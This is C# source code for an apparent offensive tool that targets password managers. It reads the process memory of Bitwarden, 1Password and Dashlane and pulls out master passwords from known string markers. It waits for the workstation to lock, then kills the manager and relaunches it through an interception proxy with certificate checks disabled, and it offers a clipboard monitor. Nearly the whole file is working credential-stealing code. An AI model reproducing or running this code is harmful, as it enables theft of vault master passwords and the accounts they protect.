public static void dumpBitwardenMaster()
{
//Process[] procs = Process.GetProcessesByName("Bitwarden.exe");
Process[] procs = Process.GetProcessesByName("BiTWarDen");
Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length);
foreach (var proc in procs)
{
DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode);
string strResult = MemoryHelper.dumpProcessMemory(proc);
//var matches = Regex.Matches(strResult, "offline_access").Cast<Match>().Select(m => m.Index);
//foreach (var match in matches)
//{
// Console.WriteLine(match);
//}
//Maybe convert this to a regex. Shouldn't take a long time and end with a cleaner result.
if (strResult.Contains("\"amr\":[\"Application\"]}"))
{
DebugFunctions.writeDebug("Found String Indicator, attempting to pull password", Globals.DebugMode);
int start, end;
start = strResult.IndexOf("\"amr\":[\"Application\"]}", 0);
end = start + 100;
Console.WriteLine("[SUCCESS] Potential Bitwarden Password Location found! {0}", strResult.Substring(start, end - start).Split('\0')[1]);
return;
}
else
{
Console.WriteLine("[-] Unable to locate Master Password in this process.");
}
} //endfor
Console.WriteLine("[-] Unable to locate Master Password in any process.");
}
public static void LaunchWithProxy(bool force)
{
//Check if screen is locked.
//Need to fix this because it only checks for a lock change notification, and doesn't determine if the screen is locked.
if (!force)
{
DebugFunctions.writeDebug("Waiting for Screen to lock before bouncing application", Globals.DebugMode);
Monitoring.CheckForWorkstationLocking workLock = new Monitoring.CheckForWorkstationLocking();
workLock.Run();
Console.WriteLine("Press ESC to exit...");
while (!workLock.screenLocked)
{
//wait a bit before checking again.
System.Threading.Thread.Sleep(10000);
}
;
DebugFunctions.writeDebug("Screen lock notification recieved, continuing.", Globals.DebugMode);
}
string procPath = "";
Process[] procs = Process.GetProcessesByName("1Password");
if (procs.Length < 1)
{
DebugFunctions.writeDebug("No Processes found", Globals.DebugMode);
}
foreach (var proc in procs)
{
if (procPath == "")
{
procPath = proc.MainModule.FileName;
DebugFunctions.writeDebug("Getting Process Path: " + procPath, Globals.DebugMode);
}
//Kill All current Running Processes.
proc.Kill();
}
DebugFunctions.writeDebug("Starting Process with New Arguments", Globals.DebugMode);
Process bw = new Process();
bw.StartInfo.FileName = procPath;
bw.StartInfo.Arguments = "--proxy-server=http://127.0.0.1:8888 --ignore-certificate-errors";
bw.Start();
}
public static void dumpDashlaneMaster()
{
Process[] procs = Process.GetProcessesByName("dashlane");
Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length);
foreach (var proc in procs)
{
DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode);
DebugFunctions.writeDebug("Dumping Memory", Globals.DebugMode);
string strResult = DebugFunctions.ReturnCleanASCII(MemoryHelper.dumpProcessMemory(proc).Replace("\0", string.Empty));
DebugFunctions.writeDebug("Parsing Memory Dump. Warning this could take a while.", Globals.DebugMode);
//string r = @"\s{3}(.+)\s{3}receiveNotif";
string r = @"\s{3}(.+)\0{3}";
foreach (Match m in Regex.Matches(strResult, r))
{
Console.WriteLine("[DEBUG] '{0}' found at index {1}", DebugFunctions.ReturnCleanASCII(m.Value), m.Index);
}
DebugFunctions.writeDebug("Finished", Globals.DebugMode);
Console.ReadKey();
}
}
public static void dumpDashLanePasswords()
{
Console.WriteLine("[!] Not Fully Implemented Yet!");
return;
//I'll come back to you, I promise.
Process[] procs = Process.GetProcessesByName("Dashlane");
Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length);
foreach (var proc in procs)
{
string strResult = DebugFunctions.ReturnCleanASCII(MemoryHelper.dumpProcessMemory(proc).Replace("\0", string.Empty));
DebugFunctions.writeDebug("Parsing Memory Dump", Globals.DebugMode);
//string r = @"\s{3}(.+)\s{3}receiveNotif";
string r = @"CDATA";
foreach (Match m in Regex.Matches(strResult, r))
{
Console.WriteLine("[DEBUG] '{0}' found at index {1}", DebugFunctions.ReturnCleanASCII(m.Value), m.Index);
}
DebugFunctions.writeDebug("Finished", Globals.DebugMode);
Console.ReadKey();
}
}
//Enable Cleartext Passwords and then read memory.
/**
* "security": {
* "concealPasswords": false
* },
**/
//Step 1. Add that line to the 1Password
//Step 2. Dump Memory(?)
//Step 3. Passwords
public static void dump1passwordMaster()
{
//Process[] procs = Process.GetProcessesByName("Bitwarden.exe");
Process[] procs = Process.GetProcessesByName("1Password");
Console.WriteLine("[DEBUG] Number of Processes Found: {0}", procs.Length);
foreach (var proc in procs)
{
DebugFunctions.writeDebug(String.Format("Enumerating Process: {0} - {1}", proc.Id, proc.ProcessName), Globals.DebugMode);
#region oldcode
/**
* //IntPtr hProc = proc.Handle;
* IntPtr hProc = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.QueryInformation | WinAPI.ProcessAccessFlags.VirtualMemoryRead, false, proc.Id);
* WinAPI.MEMORY_BASIC_INFORMATION64 mbi = new WinAPI.MEMORY_BASIC_INFORMATION64();
* //32 bit
* //WinAPI.MEMORY_BASIC_INFORMATION mbi = new WinAPI.MEMORY_BASIC_INFORMATION()
* WinAPI.SYSTEM_INFO si = new WinAPI.SYSTEM_INFO();
* if (hProc == IntPtr.Zero)
* {
* //Failed.
* Console.WriteLine("Unable to create a connection to the process! Error Code: {0}", WinAPI.GetLastError());
* Environment.Exit(6);
* }
*
* WinAPI.GetSystemInfo(out si);
* IntPtr hProc_min_addr = si.minimumApplicationAddress;
* IntPtr hProc_max_addr = si.maximumApplicationAddress;
* long hProc_long_min = (long)hProc_min_addr;
* long hProc_long_max = (long)hProc_max_addr;
* string fileName = "dump-" + proc.Id + "-" + proc.ProcessName + "-2.txt";
* StreamWriter sw = new StreamWriter(fileName);
*
* int bytesRead = 0;
*
* while (hProc_long_min < hProc_long_max)
* {
* bytesRead = WinAPI.VirtualQueryEx(hProc, hProc_min_addr, out mbi, (uint)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64)));
* if (mbi.Protect == WinAPI.PAGE_READWRITE && mbi.State == WinAPI.MEM_COMMIT)
* {
* byte[] buffer = new byte[mbi.RegionSize];
* WinAPI.ReadProcessMemory(hProc, mbi.BaseAddress, buffer, mbi.RegionSize, ref bytesRead);
* for (long i = 0; i < mbi.RegionSize; i++)
* {
* sw.Write((char)buffer[i]);
* }
* }
* hProc_long_min += mbi.RegionSize;
* hProc_min_addr = new IntPtr(hProc_long_min);
* }
* sw.Close();
*
**/
#endregion
//Slightly Dirty, but keeping the <LF> conversion to help rule out False Positives in output. Will need to re-visit this most likely.
//string strResult = File.ReadAllText(fileName).Replace("\n", "<LF>").Replace("\0", String.Empty);
string strResult = MemoryHelper.dumpProcessMemory(proc).Replace("\n", "<LF>").Replace("\0", String.Empty);
if (strResult.Contains("{\"name\":\"master-password\",\"value\":\""))
{
DebugFunctions.writeDebug("Found JSON Indicator, attempting to pull password", Globals.DebugMode);
int start, end;
start = strResult.IndexOf("{\"name\":\"master-password\",\"value\":\"", 0) + 35;
end = strResult.IndexOf(",\"type\":\"P\",\"designation\":\"password\"},{\"name\":\"account-key\"", 0) - 1;
Console.WriteLine("[+] Potential 1Password Password Location found: {0}", strResult.Substring(start, end - start));
return;
}
else if (strResult.Contains("on 1password.com.<LF>"))
{
DebugFunctions.writeDebug("First pass through didn't find anything, testing backup", Globals.DebugMode);
int start, end;
string strStartSearch = "on 1password.com.<LF>";
start = strResult.IndexOf(strStartSearch, 0) + 20;
end = strResult.IndexOf("<LF>secret key<LF>");
Console.WriteLine("[+] Potential 1Password Password Location found: {0}", strResult.Substring(start, end - start));
return;
}
else
{
Console.WriteLine("[-] Unable to locate Master Password :(");
Console.ReadKey();
}
Console.WriteLine("Fin. Press any key to exit");
Console.ReadKey();
}
}
static void Main(string[] args)
{
var parsed = Args.Parse <MyArgs>(args);
if (parsed.Debug)
{
Globals.DebugMode = true;
Console.WriteLine("[DEBUG] Debug mode enabled. Outputting debug messages");
}
//var outFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
//var cache = MemoryCache.Default.PhysicalMemoryLimit;
//Command Line Options
//Local Flag allowing the processing of a memory dump from the local machine.
//Get Processes
if (parsed.Monitor)
{
Console.WriteLine("[+] Starting Clipboard Monitor");
Monitoring.Start();
}
if (parsed.Local)
{
Console.WriteLine("[!] Not Implemented (yet)");
}
if (parsed.Proxy)
{
string[] supportedManagers = { "bitwarden", "1password" };
if (String.IsNullOrEmpty(parsed.Manager))
{
Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
return;
}
if (!supportedManagers.Any(parsed.Manager.ToString().ToLower().Contains))
{
Console.WriteLine("[!] Sorry, that password manager is not yet supported");
return;
}
new Thread(() =>
{
Thread.CurrentThread.IsBackground = true;
DebugFunctions.writeDebug("Starting Proxy. Press any key to quit.", Globals.DebugMode);
ProxyHelper.startProxy();
}).Start();
switch (parsed.Manager.ToLower())
{
case "bitwarden":
BitWarden.LaunchWithProxy(parsed.Force);
break;
case "1password":
_1Password.LaunchWithProxy(parsed.Force);
break;
}
Console.ReadKey();
DebugFunctions.writeDebug("Stopping Proxy.", Globals.DebugMode);
ProxyHelper.DoQuit();
DebugFunctions.writeDebug("Proxy stopped, Press any key to exit.", Globals.DebugMode);
Console.ReadKey();
return;
}
else if (parsed.GetMaster)
{
switch (parsed.Manager.ToLower())
{
case "bitwarden":
Console.WriteLine("[+] Checking for Bitwarden Executables.");
BitWarden.dumpBitwardenMaster();
Console.ReadKey();
break;
case "1password":
Console.WriteLine("[+] Checking for 1Password Executables.");
_1Password.dump1passwordMaster();
break;
case "keepass":
//Initiate KeePass stuff.
Console.WriteLine("[-] Not currently implemented for KeePass, but checked out HarmJ0y's KeeThief located at https://github.com/HarmJ0y/KeeThief");
break;
case "dashlane":
Dashlane.dumpDashlaneMaster();
break;
default:
Console.WriteLine("[-] Password manager not currently supported!");
break;
}
return;
}
else if (parsed.Dump)
{
if (String.IsNullOrEmpty(parsed.Manager))
{
Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
return;
}
switch (parsed.Manager)
{
case "bitwarden":
Console.WriteLine("[!] This functionality is not yet supported!");
break;
default:
Console.WriteLine("[!] This functionality is not yet supported!");
break;
}
return;
}
else
{
Console.WriteLine("[!] No Options Selected");
}
}
